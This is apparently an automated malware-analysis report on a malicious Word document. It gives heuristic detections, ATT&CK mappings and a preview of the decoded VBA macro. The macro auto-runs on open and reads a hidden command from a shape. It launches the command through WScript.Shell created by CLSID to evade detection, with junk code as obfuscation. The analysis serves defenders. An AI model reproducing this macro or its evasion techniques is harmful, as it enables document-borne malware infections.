MALICIOUS
292
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1059.001 PowerShell
T1204.002 Malicious File
T1059.003 Windows Command Shell
The sample contains a VBA macro with an AutoOpen function that leverages the dangerous WScript.Shell COM object. This macro is designed to execute obfuscated commands via cmd.exe, which in turn appears to invoke PowerShell to download and execute a second-stage payload from a series of concatenated URLs. The obfuscated command string is a key indicator of malicious intent.
Heuristics 10
-
ClamAV: Doc.Malware.Powload-6827912-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Powload-6827912-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
VBA instantiates a dangerous COM class by CLSID critical OLE_VBA_GETOBJECT_CLSID_DANGEROUSVBA uses GetObject("new:{CLSID}") to instantiate an execution/scripting-capable COM class by its raw CLSID, avoiding the CreateObject ProgID that name-based detection keys on.Matched line in script
Set sTriKPpEu = GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + tzYjtW) On Error Resume Next -
GetObject call high OLE_VBA_GETOBJGetObject callMatched line in script
Set sTriKPpEu = GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + tzYjtW) On Error Resume Next -
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Attribute VB_Customizable = True Sub AutoOpen() On Error Resume Next -
Suspicious cmd.exe invocation with execution flag high SC_STR_CMDSuspicious cmd.exe invocation with execution flag
-
Reference to PowerShell high SC_STR_POWERSHELLReference to PowerShell
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 6016 bytes |
SHA-256: 0ed6b60cad437bf6943637c3a8daafd40264f30952169cf6a3a945ba617d67f3 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
86 of 141 identifiers look randomly generated (e.g. 'jkjQbdJDi') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "TMrkPlA"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
Select Case nKCHWu
Case 314225553
REIvv = Hex(zUhjZC)
zLERQX = Cos(223964602)
TRaUEzfE = 121763573
Case 261518072
NWLPpZiXX = Hex(DqCRzowwq)
XNSzm = Sqr(223708615 / CSng(181299475 - Cos(281463566 - 125198893) + POvdow + Rnd(258247617 - 319174944)))
rizKjP = Hex(YCFJhGc)
End Select
On Error Resume Next
Select Case zwoNG
Case 175550103
OjidKi = Hex(ajmBhFp)
uTjzrzwnw = Cos(34375498)
wLztpw = 271314414
Case 2477364
MFwnwdf = Hex(ninjPCD)
dGjNSsf = Sqr(157609371 / CSng(284911953 - Cos(210719433 - 79748993) + pzCsFLi + Rnd(270457525 - 148455809)))
BOTSAQRji = Hex(vYLrG)
End Select
On Error Resume Next
Select Case jzZDIfY
Case 195887290
AwWjQ = Hex(ZGvVbBjTo)
biaFh = Cos(193137214)
iGfKwiAFk = 58605975
Case 33648512
rWsDK = Hex(kziYZz)
ltjzzYbX = Sqr(325855887 / CSng(258592911 - Cos(169270936 - 245164906) + aXuQqtbP + Rnd(320535881 - 260502099)))
iPlwiQKh = Hex(iNpTHnkd)
End Select
On Error Resume Next
Select Case PiKkVEipj
Case 169513881
mltLbKS = Hex(VOXWEUIM)
EzAhX = Cos(157456631)
VifkDSN = 341237409
Case 288827828
ZBYpn = Hex(fLMir)
FPNsb = Sqr(240342036 / CSng(216209631 - Cos(164769068 - 325076552) + NOptfh + Rnd(238957300 - 18318955)))
XiwvH = Hex(NQvUVKpm)
End Select
Set PXLqdSS = Shapes("wwUiYjcaM")
On Error Resume Next
Select Case jVuRGc
Case 62975910
OhFPhXiJ = Hex(CzLPSSjn)
AzPhiER = Cos(62599017)
vVsSjNXwH = 206288411
Case 19593862
qrMhqCuDQ = Hex(LdfcL)
jwBwYi = Sqr(230745325 / CSng(259993889 - Cos(315343634 - 240069568) + wrVKEk + Rnd(208270630 - 62137329)))
DArBW = Hex(csKOn)
End Select
bJiwwc = "" + PJdEX + ZlGow + PXLqdSS.TextFrame.TextRange.Text + sHtzSFOj + bSCqdhzG
On Error Resume Next
Select Case SIPDRL
Case 3167370
crkhNzpf = Hex(YosbO)
NAojTi = Cos(67262469)
uqauE = 185140920
Case 247657338
DrdOSll = Hex(ANzSlK)
nEvCD = Sqr(187028664 / CSng(187816416 - Cos(218873350 - 15570860) + mprnEl + Rnd(25299906 - 104988147)))
lAzzu = Hex(OXjFkrT)
End Select
On Error Resume Next
Select Case ncqplKbzk
Case 47971642
uohiJWNpl = Hex(jzPUYPQ)
ClvTLF = Cos(335759634)
khvhCdW = 212062023
Case 259993361
cINfBqj = Hex(HdaUMu)
fiVCac = Sqr(188008983 / CSng(233023080 - Cos(222599312 - 251266400) + tDbCdjhB + Rnd(257995448 - 53173411)))
WkFjv = Hex(VAPUAVWvA)
End Select
On Error Resume Next
Select Case OYuCKE
Case 179509213
dfDrP = Hex(wKOZwJ)
PXsNbsaIA = Cos(112736752)
FSkEZV = 227034674
Case 233707858
pzMvubAt = Hex(vPDiOzBCp)
MAucOomz = Sqr(182348749 / CSng(289622094 - Cos(242573929 - 294252594) + MXKPLzSAs + Rnd(215963956 - 75948399)))
BKWDk = Hex(XfzXk)
End Select
On Error Resume Next
Select Case YVqZM
Case 64247105
AtWwwC = Hex(mjhJc)
aTrIWGwT = Cos(270714333)
Qhrch = 266697035
Case 176200267
szQzhSs = Hex(LoibCJsG)
EiiDFNw = Sqr(72590518 / CSng(246730006 - Cos(43646092 - 117618199) + ZVwFL + Rnd(110925152 - 192901146)))
amYQmv = Hex(kNFHo)
End Select
Set sTriKPpEu = GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + tzYjtW)
On Error Resume Next
Select Case LVKwXLD
Case 328464014
zYlSCUUD = Hex(XoobltXt)
zPJXN = Cos(170814519)
wSYZFCFFW = 314369590
Case 316532397
JGYwrzr = Hex(jkjQbdJDi)
ZLLTGBv = Sqr(200172338 / CSng(200427274 - Cos(136924903 - 232792512) + EpzzjvaR + Rnd(120748192 - 157310558)))
iSLiHwb = Hex(BXwVkMqAX)
End Select
Const RkXlasdp = 0
On Error Resume Next
Select Case njENW
Case 311023780
qVqRGRWMO = Hex(jcuEOXCL)
RwYcka = Cos(66799475)
vfOaTTFI = 216999679
Case 61465550
UVGrIzkOV = Hex(ZJCCCdzRs)
qwiaj = Sqr(151900 / CSng(94634990 - Cos(89436676 - 60511179) + vhNFqwKG + Rnd(107251246 - 206791666)))
LolWW = Hex(YQpFro)
End Select
On Error Resume Next
Select Case zaZEpYOS
Case 223804275
jtfWj = Hex(XiWCYjfia)
ZicjQu = Cos(41803654)
iuXTbl = 106620847
Case 219313503
WqsmVSpw = Hex(oCOOv)
dczfpBppm = Sqr(96221498 / CSng(261634855 - Cos(266057239 - 122579271) + Clmrz + Rnd(56286925 - 263473732)))
aEQnjOFD = Hex(Uzcpz)
End Select
On Error Resume Next
Select Case oUukq
Case 35752782
PjSva = Hex(XaGoBTZB)
zsCiO = Cos(202743273)
JWzKFUzSC = 12630467
Case 274492885
zYkCAjINi = Hex(fLwFlUCh)
qZQXvz = Sqr(105082529 / CSng(214283243 - Cos(23509120 - 179741470) + mzdZCdPp + Rnd(15470181 - 309503076)))
RPbqm = Hex(AiiQUp)
End Select
sTriKPpEu.Run# bJiwwc, RkXlasdp
On Error Resume Next
Select Case aPMLWNp
Case 182459235
bQpbAUtZm = Hex(wzlzutpwt)
bYzOaj = Cos(158523348)
lzWOQLY = 3831224
Case 143716721
wnDEU = Hex(kipSRS)
QwLWCRaA = Sqr(108130003 / CSng(318683607 - Cos(103459751 - 263237476) + ajiZYuXl + Rnd(4674533 - 39131188)))
XEoivu = Hex(LTPGS)
End Select
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.